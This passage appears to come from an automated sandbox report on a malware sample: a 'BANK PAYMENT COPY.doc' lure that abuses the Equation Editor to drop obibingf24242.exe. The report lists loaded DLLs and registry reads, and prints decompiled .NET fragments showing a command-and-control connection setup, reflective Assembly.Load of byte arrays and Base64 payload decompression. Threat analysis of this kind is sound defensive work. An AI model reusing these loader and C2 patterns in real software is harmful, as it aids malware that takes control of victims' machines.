Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: wbemcomn2.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: BANK PAYMENT COPY.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\BANK PAYMENT COPY.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: fSgG.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr
Source: Binary string: fSgG.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr

Data Obfuscation

barindex
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: vnobizxc[1].exe.2.dr, Form1.cs .Net Code: InitializeComponent
Source: obibingf24242.exe.2.dr, Form1.cs .Net Code: InitializeComponent
Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs .Net Code: Memory
Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs .Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs .Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs .Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs .Net Code: Memory
Source: vnobizxc[1].exe.2.dr Static PE information: 0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002A596A push esi; ret 2_2_002A596B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002A5962 push esi; ret 2_2_002A5963
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0029C288 pushad ; retn 0029h 2_2_0029C289
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002A58F3 push esp; ret 2_2_002A5903
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_002901F4 push eax; retf 2_2_002901F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0029C2C8 pushad ; retn 0029h 2_2_0029C2DD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00298ED5 push eax; retf 2_2_00298F61
Source: C:\Users\user\AppData\Roaming\obibingf24242.exe Code function: 5_2_00219A1B push eax; retn 0017h 5_2_00219A25
Source: vnobizxc[1].exe.2.dr Static PE information: section name: .text entropy: 7.7368081138603095
Source: obibingf24242.exe.2.dr Static PE information: section name: .text entropy: 7.7368081138603095
Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, kD0JNdgNBriBGn5egS.cs High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, kD0JNdgNBriBGn5egS.cs High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, YqOlYl2eFwtfPkt21E.cs High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, MhaIhDzaPUNsFfpULt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, RqmCPZsVMMv5nbrMN6.cs High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, iNFWmT65K4oBOHdv97.cs High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, mdHoHt9MfgQhGOrMY7.cs High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, PonY1JM82D8ygbKCcG.cs High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, OOJ1Sjc3ammghXBN9E.cs High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, LDBvEBvJJ3O33kFquaV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, ySkLlbvukfHRnCTtESI.cs High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, aIGDt4fqLpMXZpZXEp.cs High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, vVt6wEQ8mT4XM4diZg.cs High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, amwXR0CPXsVauy8NYU.cs High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, oU7Yibkb84IpiWUtkd.cs High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, BXplLTWfheod5WBiyg.cs High entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, Nffji0ITJKe56hgjhg.cs High entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, VTGJwXxvM7Ziv4PKG3.cs High entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, kD0JNdgNBriBGn5egS.cs High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs High entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs High entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, MhaIhDzaPUNsFfpULt.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, RqmCPZsVMMv5nbrMN6.cs High entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, iNFWmT65K4oBOHdv97.cs High entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, mdHoHt9MfgQhGOrMY7.cs High entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, gkMdOYbUoH9rcjFeuZ.cs High entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, PonY1JM82D8ygbKCcG.cs High entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, OOJ1Sjc3ammghXBN9E.cs High entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, ChekuZ3HCIwSmN8ZNP.cs High entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, LDBvEBvJJ3O33kFquaV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, ySkLlbvukfHRnCTtESI.cs High entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, aIGDt4fqLpMXZpZXEp.cs High entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, vVt6wEQ8mT4XM4diZg.cs High entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, amwXR0CPXsVauy8NYU.cs High entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, oU7Yibkb84IpiWUtkd.cs High entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, iGrKvbOUPHtmRDgSTJ.cs High entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
